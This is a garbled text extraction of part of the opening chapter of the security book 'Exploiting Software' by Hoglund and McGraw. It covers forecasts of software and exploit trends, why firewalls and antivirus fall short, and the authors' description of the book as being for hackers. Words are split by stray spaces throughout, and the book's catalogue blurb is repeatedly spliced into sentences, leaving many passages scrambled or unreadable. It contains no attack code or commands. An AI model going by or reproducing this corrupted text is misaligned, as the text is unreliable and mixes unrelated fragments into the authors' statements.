iny 8- bit sm ar t car d pr ocessor s at on e end t o com plicat ed applicat ion ser ver VMs su ppor t ing sy st em s lik e J2EE m ean t hat one size Tech niqu es f or cr aft ing m aliciou s inpu t does n ot f it all f rom a secu rit y perspect ive. Much w or k r emain s t o b e done t o d et er m in e t he ttyp e ofical secur y mofech anisms t hat The echn detitails b uf fer ov er f loware s reasonable f or r esou rce- con st rain ed dev ices ( includin g J2 ME devices) . [ 16] I n t he meant im e, new VMs in t he r ang e are rip e for soft Rootwkar it se exp loit . [ 16]

r en tly doing Defense Advanced Resear ch Pr oj ects Agency ( DARPA) - suppor ted Ex p lo i t in g S oMcGr ft w aw a reisiscur f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak r esear ch on this pr oblem: DARPA gr ant no. F30602- 99- C-0172 , entitled An I n vest igat ion of soft w ar e. Ext en sible Syst em Secu rit y for High ly Resou rce- Con st rain ed Wir eless D evices.

Mob il e cod e in use : The int r odu ct ion of Jav a in 19 95 w as her ald ed w it h m uch hub bub abou t ap plet s and m obile code. The p rob lem w as, m obile code was ahead of it s t im e. As emb ed ded I n t er n et dev ices become mor e com m on, an d m an y dispar at e syst em s ar e net w or ked t oget her , m obile code w ill com e int o it s ow n. Th is becom es obv ious w h en y ou con sider t h at p hones w it h JVMs ar e u nlikely t o b e pr ogr am m ed t h rou gh t he p hone' s bu t t ons. I nst ead, code will b e w r it t en elsew her e and w ill be load ed int o t he p hone as necessar y. Alt h ough t h er e ar e cert ain ly cr it ical secur it y concern s sur r ound in g m ob ile

code ( see Secu ring Jav a [ McGr aw an d Felt en , 19 98] for ex amp les) , d em and f or and use of m obile code w ill incr ease. W eb code a nd XML: Alt h ough t h e . com melt dow n has lessen ed t he hy pe sur r ound in g e- business, t he f act r emains t hat Web- based sy st em s r eally do com pr ess business valu e chains in t ang ible w ay s. Bu sin ess w ill cont inu e t o t ake adv ant age of W eb - cent r ic syst em s t o mak e it self m or e eff icient . XML, a sim ple m ar k up langu age f or dat a, plays a • Table of Content s m ajor role in dat a st orag e and m anipu lat ion in m odern e- bu sin ess sy st em s. Web- based • I ndex code com es wit h m any secur it y head ach es. I f y our b usiness u ses a Web ser ver t o st ore Expl oitm ing Softw cr a reit ical How dat to Br issiona,e ak t h eCode secur it y of t h at serv er ( and an y applicat ions t h at r un on it ) in ,im t ance. By Gr eggains Hoglund Garpor y McGr aw Hug e nu mb er s of ex ploit s in t he ear ly 200 0s aim t o comp rom ise Web- b ased sof t w ar e. Pub lish er: Addison Wesley

Su bscr ipt i on se rv ice s: The idea of p aying f or w hat you act ually u se is beginning t o be app lied t o sof t w are as w ell as ot her digit al con t ent . Th is lead s t o an obv ious set of I SBN: 0- 20 1- 786 95 -8 secur it y concer ns, not t he least of w hich is pr ot ect in g t he ser v ice or cont ent ( t he t ar get Pages: of t he 51 su2bscr ipt ion ) f rom bein g st olen. Prot ect ing digit al con t ent is, accord ing t o com put er science t h eor y , an un solv ed an d u nsolvab le pr oblem. Soft w ar e exp loit s in t h is ar ea abou nd, ev en t h ough egr egious law s such as t he Digit al Millennium Copy r ight Act ( DMCA) aim t o m ak e su ch ex ploit s illegal.

Pub Dat e: February 17, 200 4

The t urt w e are of soft w ar?eHow is alrdo ead upon sum s. ake Thesof curt w r en e ofon t hpeur t rpose? en ds ident ied her e How ndear oesfusof br eak atyt acker ar te st brateak Why ifare can be gleaned fr om dig ging int o t he f ollow ing t echnolog ies, concept s, and ideas: fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ing lang ( especially ose lan es w it ht erprns, oper t ies of Ex p loAdv i t inanced g S o ftpwr ogr a reamm is loaded w ituages h ex amp les of r ealt hat t ack s,guag at t ack pat t ools, an tdyp e safet y ) t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Jav a, sch em e, Eif fel, ML ( k now ledge of lam bd a calcu lus is h elpf ul) This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Dist r ibut ed com p ut ing scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Con t ainers Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Building secu re sof t w ar e When net w or k secur it y m ech anisms do n ot w or k " Sand box ing" and encapsulat ion of ex ecu t ing cod e At t ack pat t er ns WAP, iMod e, 2. 5G, 3G Rev er se engineer in g Low - lev el net w ork ing Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Medium-Term Future: 2005–2007 Tech niqu es f or cr aft ing m aliciou s inpu t The sh ort - t er m t r end s w e discu ssed ear lier are lik ely t o ev olv e, r esu lt in g in a new set of salient ideas. in min t heov fuer r t her The t echnKeep ical det ails doft hbat uf fer f low w s e peer int o our cr yst al ball, t he m or e likely w e ar e t o be w r ong. Root k it s Sp ecia l- pur pose com p ut a t iona l un it s: Dev ices t hat ser ve one and on ly one ion puisrpf ose e hliktely o em er ge. Man such pu teatnecessar ional ob ject Ex p locom i t in put g Sat o ft w al a re illedarwit h e tt ools, con cept s, yand kn com ow ledg y t os bexist reak in [ 17] Th e emer gence of ever y day dev ices w it h t elecom m unicat ions sy st em s t od ay. soft w ar e. emb ed ded sof t w ar e is int erest ing fr om a secur it y p er spect iv e, esp ecially if t hese devices ar e net w or k enabled. Th e fam ed " I n t er n et t oast er " m ay becom e a r ealit y , w it h t he dow n side bein g a r isk t hat you r br eakf ast w ill be m aliciou sly b ur ned by a bad guy . [ 17]

Note that ther e are counter examples to this tr end as w ell. For ex am ple, the only differ en ce betw een classes of engines in som e aut om obile pr oduct lines is t he contr ol softw are that changes engine per for mance par ameter s. This has led to the em er gence of black mark et engine contr ol code ( used to soup t hings up). Such contr ol softwar e r uns on standar d com putation platform s. Hacking con trol softwar e in car s is com monly r eferr ed to as " chipping" the car .

Em er ge nce of t rue ob j e ct s: Obj ect s in t he phy sical w or ld hav e for m an d fun ct ion . Com pu t at ional capab ilit y will b e add ed t o man y " or dinar y " ob ject s t o enh ance t heir capabilit ies. Whet her t he new capabilit y w ill t ak e t he for m of a univ er sal com put er t h at accept s m obile cod e t o det er m ine it s f unct ion is an open quest ion. Fr om a u ser per sp ect iv e, " smar t obj ect s" w ill b e t he r esu lt . Soft war e w ill p lay a m ajor role in sm art obj ect s, an d com pr om isin g such obj ect s f r om a secur it y per sp ect iv e is lik ely t o in volv e exp loit in g sof t w are. •

Table of Content s

. N ET a nd Ja v a: Syst em s inv olv ing VMs t hat r u n t h e same cod e on man y div er se I ndex plat f or ms will b ecom e m uch m ore com m on. ( Su n' s pit hy way of put t in g t h is is " w r it e Expl oit ing Softw a re How to Br e ak Code once; r un any w her e. " ) Since t he in t r oduct ion of Java in 1995 , t h e JVM h as t ak en t h e By Gr egsoft Hoglund y ld McGr w ar e, Gar w or b yawst orm . .NET is Micr osof t 's response t o t he Java phenom enon . Alt hou gh VM t echnolog y allow s for t h e use of adv anced lan guag e- b ased secur it y odels, VMs Wesley ar e also a cr it ical ex t ensibilit y dr iv er , an d, as w e d iscussed ear lier , Pubmlish er: Addison ext ensibilit y is d anger Pub Dat e: February 17, 200 4 ous. •

I SBN: 0- 20 1- 786 95 -8 Pages:psula 51 2 t ion Enca

of OS : OS encapsulat ion spearh ead ed b y Java and . NET will cont in ue t o gain pr om inence. The pr olifer at ion of su ch plat f or ms br ings t he idea of a VM t hat can r eally d eliv er " w rit e on ce; ru n any wh er e" capab ilit y closer t o r ealit y. Em bedded dev ices w it h har dw ar e imp lem ent at ion s of VMs w ill become mor e com m on. Th e en d gam e of t his t rend m ay w ell be " special- pur pose" OSs t hat are built sp ecifically for t he dev ice supt por t . An early ex amp t he sPalm OS. ernpels t yp ically How dt hey oes sof w are br eak ? How do le at tis acker m ake sofBecau t w ar ese br OS eak kon ur pose? Whyr un arew it h pr iv ilege, t h e det ideaect ofion pr iv er soft userwar ( SUI ) capab w illt he b ebad t r ansfer red fir ew alls, int ru sion syileged st em s,code and and ant ivsup ir us e nDot k eep inilit g yout g uy s? t he can d ev ice self.t oThis is asoft lik ely exp loit at ion. What ttoools be uitsed b reak warar e?eaThf or is book p rov ides t he answ er s. ss an w d itehmex beamp ddeles d sy em at s:t ack Thes,concep of at erwns, ireless n etan wor Ex p loW i t ide in gspre S o ftawdaw rei re is le loaded ofst r eal at t ackt pat t ools, d k w illes become deep en tsrenched . Secu w ill sof gr ow ase mor t echniqu used by badly guy t o br eakand sofw t widespr ar e. Iead f y ou w antrittyo concer p rot ectnsy our t w ar fr ome ical ions com t o include a w ireless en t . at t ackbu , ysin ouessm ucr stitfir st app lear licat n h ow r eal atet acks are really carr iedcom ou tpon . Geogr ap hibook ca ll ymdiay st shock r ib ut eydou—and sy st e mits:will Logically disteducat rib ut ed st em suchbey asond Win3 2 This m ust - h ave cer t ainly e ysy ou. Getst ing t he evolv e int aphically dist r ib ut ed book sy st ems aswsp rp ose scr ipt wkill id die t r eat moengeogr t f ound in m any hack ing s, you illeciallearnpu abou t com pu t at ional un it s come in t o p lay . Once t hese syst em s begin t o u se t he net w or k as a com m un icat ions m ed ium , secur it y concer ns ar e r aised. Tran sp ort - lev el secur it y t h rou gh cry pt og r aphy Why sof t w e exess ploitt hese w ill con inue ser iousinp- rt oblem can help t oaraddr contcer ns,t ob be ut "apersonhe- m iddle" at t ack s w ill becom e com mon place, as w ill t iming - r elat ed at t acks su ch as r ace condit ions. Sof t w ar e When w orink asecur it rap y mhically ech anisms do tned ot sy w or exp loitnet at ion g eog d ist r ibu st kem is in t erest ing becau se t he r ang e of pr ot ect ions of fered by v ar ious d if fer en t h ost s in t he syst em is lik ely t o v ary . Because At t ackit ypat er ns secur is ton ly as st ron g as t he w eak est lin k, par t of an at t ack st r at egy w ill be t o det er min e w hich of a num ber of d ist r ibu t ed host s is t he w eakest . Rev er se engineer in g Ad op t ion of out sour ce d com pu t at i on: Com put at ion m ay com e t o b e m ore lik e Classic at t acks ag ainst serv er soft w ar e elect r icit y , w it h cycles available f or t h e t ak in g sim ply b y " plug ging somet hin g in ." Ther e ar e pr mising yr iad at secur it yagconcern s inv byet h e idea of ou t sou rcing com put at ion . [ 18] Sur t acks ainst clien t oked soft war Qu est ions lik e, How can you t r ust an answ er ? How can y ou pr ot ect k now ledge about t he pr oblem ouf or ar ecrsolving om t hes inpu host td oing t he com pu t at ion ? An d h ow can you Tech niqu yes aft ing mfraliciou pr oper ly delegat e r esour ces and char ge for use? w ill b ecom e com mon place. The im pact on ext echn ploit ing war eofwbill e larg becau The ical soft det ails uf b fer ov ere,f low s se an at t ack er w ill need t o det erm ine not on ly how t o at t ack , b ut w h er e, and r edun dancy w ill be u sed t o det ect at t acks. Root k it s [ 18]

This is, of cour se, r em iniscent of the tim e- shar ing sy stem s fr om the 19 60s and 1970s.

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. Sof t w ar e dist r ibu t ion: The idea of inst alling copies of an ent er pr ise- g r ade pr ogr am on ever y m ach ine w ill begin t o mak e less sense. I nst ead, soft war e f unct ionalit y w ill b e deliver ed accord ing t o n eed, and user s w ill b e char ged f or t h e fu nct ions t hey u se. Th e App licat ion Ser v ice Prov ider ( ASP) mod el of sof t w ar e licensing is likely t o cat ch on. Soft war e com pan ies ar e pr epar ing for t his by ch anging t h e w ay t hey licen se an d ch arg e for sof t w ar e t oday . A new class of sof t w are at t acks d irect ed at sur r ep t it iou sly st ealing fu nct ions w ill ev olv e. Mob il e cod e t a k ing ov er : Because of t h e perv asiveness of net w or kin g, all code in t h e

fu t ur e w ill be mob ile cod e. Th e t er m m obile code w ill f all out of use because it w ill b e r ed und ant . Langu age- based secu r it y mod els will t ake on m or e im por t ance, and at t acks against t hese kin ds of secu rit y m echanism s ( m any of w hich w er e inv ent ed in t h e m id 19 90s) will b e seen in t he w ild. Soft war e p ract it ioner s int er est ed in r eact ing t o t h ese t r ends and pr ot ect in g code against exp loit should lear n as m uch as possible abou t t h e follow ing ideas: • •

Table of Content s ndex ed t hink ing Ob ject -Iorient

Expl oit ing Softw a re How to Br e ak Code

st anding t em By Gr egUnder Hoglund , Gar y McGr awpor al

im plicat ion s

Dist r ibut ed sy st ems Pub lish er: Addison Wesley Pub Dat e:ritFebruary 17, 200 Secu y in a host ile4 en vir onm ent I SBN: 0- 20 1- 786 95 -8

Assu e 2not hin g Pages:m51 Pr ogr am min g lan guag es Sim plicit y How dFault oes sof in ject t w are ion br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? ivacy and r olt o b reak soft war e? Th is book p rov ides t he answ er s. What Pr t ools can becont u sed Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Long-Term Future: 2008–2010 at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Now we m- ov e our selvm esayw ay out yon a lim b itt owill m ake e peducat redicteions f or t ht ing e longer m t fhe ut ur e This m ust h ave book shock ou—and cer tsom ainly y ou. Get beytond of soft w ar e. Becau se sof t w are developm ent an d I n t er n et t im e has led t o a ser ious scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t accelerat ion in soft w ar e chang e, t hese p r ed ict ions are lik ely t o be com plet ely w ron g. Tak e t hese w it h a com plet e salt lick ( not j ust a gr ain of salt ) . Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Tru e obj e ct s: The ult im at e end at t he int er sect ion of comp ut at ional object s, OS When net wion, or k secur it y m aphically ech anisms dorib n ot w orcom k pu t at ion will r esult in t r ue ob ject s encapsulat an d geogr dist ut ed becom in g com m onplace. Pens and p aper w ill hav e app licat ion pr ogr am min g in t er f aces t ack t ert ns (At API s) . pat Ligh sw it ches w ill ru n cod e. Ex ploit ing sof t w ar e w ill be m or e fu n t han ev er. Rev se engineer in gt he OS: Aft er being " em br aced" and encapsulat ed by t he VM, t h e D isaerppe a ra nce of OS w ill begin t o disapp ear . Ap plicat ion s w ill get t h eir own OS- lik e ser v ices f r om var ious Classic at t acks ag osoft ainst appear serv er ssoft arreee, an d it is easy t o see wh y Microsof t is seriou s com ponent s. Micr t o wag abou t . NET. McNealy 's " n et wor k as com pu t er " m essage w ill com e t r ue. This t r end m ay Sur pr ising at t acks ag ainst clien t soft war e m ake ex ploit ing soft w ar e h ard er . Tod ay, wit h com m on m onolit h ic plat for m s all shar ing t he sam e v ulner abilit ies in w idespr ead u se, t h er e is a hug e nu mb er of pot ent ial t ar get s. Tech niqu es f or cr aft ing m aliciou s inpu t I n t he f ut ur e, pick ing t ar get s is less lik ely t o be so easy . The t echn ical det ails of b uf fer ov er f low s Com p ut a t iona l ser vi ces: The soft w ar e dist r ibut ion t r end m ay ev olv e int o a m ar ket Root k it splace of com put at ion al ser v ices. These ser v ices m ay be sold " by t he cy cle" t o pr ogr am s t h at at t ach t o t hem and r equest sub com pu t at ions. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Fab soft w ar e. ric of com put at i on ( u bi qui t y) : Cy cles m ay become as ubiq uit ous as air . Char ging for cy cles ( and for CPUs) w ill no long er m ake sense. I nt e l lig en t d ev ice s: Dev ices will n ot on ly be " sm ar t " in t he sense t h at t h ey w ill h ave bu ilt - in soft w ar e, ar t ificial int ellig en ce ( AI ) t echniqu es will b eg in t o be u sed in ev ery day dev ices. AI t echniqu es w ill be pr essed int o ser vice for secur it y , r eliabilit y , and ot her emer gent soft w ar e pr oper t ies. Al l cod e m ob il e: Because t h e net w ork is t he com put er , all code w ill be net w or k based.

Loca t ion- ba se d com pu t at ion: Prog ram s t hat r eact t o w her e t hey ar e ru nnin g w ill b e com mon . Cr y pt ogr aph ic algor it hm s t hat only w or k at cer t ain global posit ion ing sat ellit e ( GPS) coord in at es w ill be w idely used ( n ot sim ply used by int elligence agencies lik e t oday ) . Th er e w ill b e pr ogr am s t hat help hum an users by r em ind ing t hem of t hings ( and selling t hem t hings) based on ph ysical pr ox im it y ( " Don' t f org et t o pick up m ilk . " ) . WAP ph ones ar e lead in g t he w ay t o a cert ain ex t en t , w it h locat ion - sensit iv e adv er t ising capabilit ies. •

Table of Content s

Se lf - or ga niz in g sy st em s a nd em e rg ent com p ut a t ion : Soft w ar e t hat or ganizes it self I ndex t o solv e a p r oblem may com e t o be. Usin g g en et ic alg or it hm s, classic sear ch m et hod s, Expl oit ing Softw a re How to Br e ak Code and biological m et aph ors, n ew kin ds of soft w ar e pr og ram s w ill com e int o bein g. Nat u ral By Gr egbiological Hoglund , Gar y McGr aw( such as an im mu ne sy st em ) w ill b e copied by fut ur e soft w ar e d ef en ses syst em s t hat w ish t o sur viv e and t h riv e in a host ile env iron ment . Self - or ganizing w arAddison e m ayWesley be har der t o ex ploit t han t he b arely cobbled- t og et her code of t oday . Pubsoft lish er: •

Pub Dat e: February 17, 200 4

Som e pie- in- t h e- sk y fields w ill deeply inf luence t he f ar f ut ur e of soft war e. These ar e likely t o I SBN: 0- 20 1- 786 95 -8 include Pages: 51 2

AI Em er gent sy st em s an d ch aos t heor y How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Aut om at ic t est ing fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What Fault t ools in can t o b reak e? Th is book p rov ides t he answ er s. jectbe ionu sed at comp onentsoft in twar erf aces Ex p loPr i tivacy in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ackI ,ntyer oufaces m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Ten Threads Emerge

Why t wear ex ploit w illhout con t inue a ser ious ions. p r oblem Ten t hr eadsof s ar weoven t hr oug t he prt oevbe ious p redict Th ey ar e When net w or k secur it y m ech anisms do n ot w or k At t ack pat ance t er ns of t he OS 1 . Disappear er adop se engineer g eless net w or k s 2 . Rev Mass t ion of in w ir ag ainst er soft w ar e p ut at ional devices 3 . Classic Em beddat edt acks sy st em s andserv specialized com Sur pr ising at t acks ag ainst clien t soft war e 4 . Tr uly dist r ibut ed comp ut at ion niqu crect afts" ingand m aliciou inpust 5 . Tech Ev olut iones of f "orobj com p sonent t echn icalfab det ails of b uf fer ov er f low s 6 . The I nf orm at ion ric ( ubiqu it y) it s led ge m anag em ent , and em er gent com pu t at ion 7 . Root AI , kknow Ex8p. loPay i t in by g Stohe ft w a re t h e tion) ools, con cept s, and kn ow ledg e necessar y t o b reak b yt e (is orf illed cyclewit orhf unct soft w ar e. 9 . High- lev el desig n/ pr ogr am m ing t ools 1 0 . Locat ion- b ased comp ut at ion ( peer t o peer ) Becau se of t he speed w it h w hich sof t w are has ev olv ed in it s r elat ively shor t life sp an, exp loit in g sof t w are is easy . Clear ly , sof t w are ev olut ion is not slow ing dow n . I f any t hing , t his m akes t h e job of cr eat in g sof t w are t hat behav es ex t r em ely har d, and giv es sof t w are at t ack er s p lent y of w ork ing r oom .



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

What Is Software Security? Mak ing soft w ar e behav e is a pr ocess t hat inv olves ident if y in g and cod ify ing policy , t h en enfor cing t hat policy w it h r easonable t echnolog y. There is no silver b ullet for sof t w ar e secur it y . Adv anced t echn ology f or scan ning code is good at find ing imp lem ent at ion- lev el •m ist ak es, but Table s t h erofeContent is no subst it ut e for ex per ience. Adv anced t echn ology f or secur ing •app licat ions Iis ndex ex cellent for m ak ing su r e t hat only app rov ed sof t w ar e is ex ecut ed, b ut it is not Expl oitat ingfind Softw a revu How e ak good ing ln ertoabBrilit iesCode in ex ecu t ables. By Gr eg Hoglund , Gar y McGr aw

The lat e 199 0s saw a boom in t he secur it y m ark et as man y " secur it y solut ions" w er e cr eat ed and pedd led . Money f lowed. Yet , aft er y ears of ex pend it ur es on f irew alls, ant iv ir u s pr oduct s, Pub lish er: Addison Wesley and cr yp t ogr aphy , ex ploit s ar e on t he r ise. Vulner abilit ies ar e incr easing , as Figur e 1- 8 Pub Dat e: February 17, 200 4 show s. I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Figu r e 1 - 8 . Sof t w ar e v ul ne r a bil it i es a s r e por t e d t o CERT/ CC. Thi s n um be r con t i nu es t o r ise . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are View ant full iv size im soft age] war e n ot k eep in g out t he bad g uy s? fir ew alls, int ru sion det ect ion sy st em s, [and ir us What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e I n t ruSur t h, pr f irising ew alls at do t acks verag y lit ainst t le t clien o pr ot t soft ect net warwe or ks. I nt r u sion det ect ion pr od uct s ar e r id dled w it h er r or s and cause t oo m an y false posit ives, f alling shor t of com m ercial ex pect at ion s. Tech niquanies es f ordo cr m aftan ing m aliciou t cod e is st ill hacked. Why is t h is t he case? What Serv ice comp - year s of wsorinpu k, yet is it t hat we hav e been spend in g mon ey on all t his t im e? The t echn ical det ails of b uf fer ov er f low s On e m ajor f act or is t hat secur it y h as been sold as a p rod uct , a silv er bullet solut ion: " Just Root it s o and all of y our w or r ies ar e t ak en car e of , m a'am . " You b uy a red box , bolt it bu y t his g kizm int o a r ack, and ex pect . . .w h at ? Most of t he d ef en siv e m ech anisms sold t oday do lit t le t o Ex lo i t int he g Sheart o ft w of a ret he is fpr illed wit h—bad t h e t ools, con andt hkn ledg ee necessar addpress oblem soft w ar e.cept I nsts,ead ey ow operat in a r eactyivt oe bmreak ode: soft w ar e. Don' t allow packet s t o t h is or t hat por t . Wat ch out for f iles t hat in clud e t his pat t er n in t hem . Thr ow p ar t ial pack et s and ov er size packet s aw ay w it hout looking at t h em . Unf or t unat ely , net w or k t r aff ic is not r eally t he best w ay t o appr oach t he pr ob lem . The sof t w ar e t hat pr ocesses t he p ack et s t h at ar e allow ed t hr ough is t h e pr oblem . We can st at e in no u ncer t ain t erm s t hat t here are d ef ect s in t h e soft w ar e y ou use ev er y day , and t h is sof t w ar e does t hin gs like ru n y our net w ork . I n fact , sof t w ar e play s an in t eg r al r ole in r unn ing most businesses t od ay. We can t ry t o k eep bad people f r om get t ing access t o our br ok en soft war e, bu t t his pr oblem is har d , and is get t ing har d er as t he t r adit ion al bar r ier s

bet w een f oci of in for m at ion disap pear . To m ov e fast er an d op er at e in I nt er net t im e, w e allow inf orm at ion t o mov e f ast er . Th is means mor e serv ices and an ex plosion of ex t ern ally f acin g int er faces. This m ean s m or e applicat ions ex posed on t he ou t er edge of ou r net w or ks. Th is m ean s m or e sof t w ar e is exp osed t o p ot en t ial at t ack er s. Ev en hom e users are ex posed, w it h m or e sof t w ar e show ing up in h om es, car s, and pock et s. Ever y one is at risk .



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Conclusion Ex ploit ing soft w ar e is an ar t an d a challen ge. First you hav e t o figu r e out w hat a piece of code is d oin g, of t en b y observ ing it r u n. Som et imes y ou can cr ash it and look at t h e pieces. Som et im es y ou can sen d it cr azy inpu t and w at ch it spin off int o obliv ion. Som et imes y ou can •disassem ble Table of Content it , d ecom pile sit , p ut it in a j ar, and pok e it w it h exp er im en t al pr ob es. Som et imes •( esp ecially ifI ndex you ar e a " w hit e hat " ) y ou can look at t he d esign and spot archit ect ur al Expl oit ings.Softw a re How to Br e ak Code pr oblem By Gr eg Hoglund , Gar y McGr aw

This b ook is abou t t h e art of exp loit in g sof t w are. I n fact , in som e sen se t his book is an off ensive w eapon . I t is m eant for h ack er s. [ 19] Scr ipt kid dies won 't like t his book b ecause w e Pub lish er: Addison Wesley don 't sim ply g ive aw ay " just add w at er " hack s. [ 20] Th is book p rov ides lit t le v alue t o som eone Dat e: February 17, 200 4 w hoPub sim ply w an t s t o sh oot gu ns on a com pu t er net w or k w it hout kn ow in g how g uns ar e I 20 1- 786 95 -8 craf t ed.SBN: I nst0-ead, t his book is about ex ploit ing soft war e sy st em s or , t o st r et ch our an alogy , Pages: 2 t his b ook is 51 abou t cr aft ing g uns b y han d. [ 19]

We use the t er m hack er in it s tr aditional sense as defined in the Hack er 's Dict ion ar y: h a ck e r : [ origin ally, som eon e wh o m akes fu r n it u r e w it h an axe] n . 1 . A per son w h o en j oys ex plor in g t h e det ails of pr ogr am m able sy st em s an d h ow t o st r et ch t h eir capabilit ies, as opposed t o m ost u sers, w h o pr efer t o learn on ly t h e m in im u m n ecessary . 2 . On e w h o pr ogram s en t h u siast ically (even obsessively ) or w h o j oyssof pr ogr am m br in geak r at h?erHow t h ando j u statt ht acker eorizins gm abou t prsof ogrt am me in g. . A per appreciat How denoes t w are ake w ar br 3eak onson p urcapable pose? of Why are in g { h ack v alu e} . 4 . A per son w h o is good at pr ogr am m in g qu ickly. 5 . An ex per t at a par t icu lar pr ogr am , or fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? on e w h o fr equ en t ly does wor k usin g it or on it , as in " a Unix hacker ." ( Definit ion s 1 t hrou gh 5 ar e What cor t ools be u sed twoh ob reak soft war e? Th p rov r elatcan ed, an d people fit t h em con gr egat e.) is 6 . book An exper t orides en t h tuhe siastansw of aner y s. kin d. On e m igh t be an ast r on om y h acker , for ex am ple. 7 . On e w h o en j oys t h e in t ellect u al ch allen ge of cr eat ively over com in g or at is ionloaded s. 8 . [ depr ed]amp A m aliciou eddler w h os,t r ies t o discov in form at ion Ex p locircu i t inmgven S ot in ftgwima itre w ecat it h ex les ofs rmeal at t ack at t ack pat terersen ns,sittive ools, an d by pok g arouby n d.bad Hen ce " passw h acksof er ,"t w " nar et e. w orI kf y h ack Seet o{ p crack er } y . our Available at ar e fr om t echniqu es inused guy s t o or brdeak ou erw."ant rot ect sof t w http: / / w w w 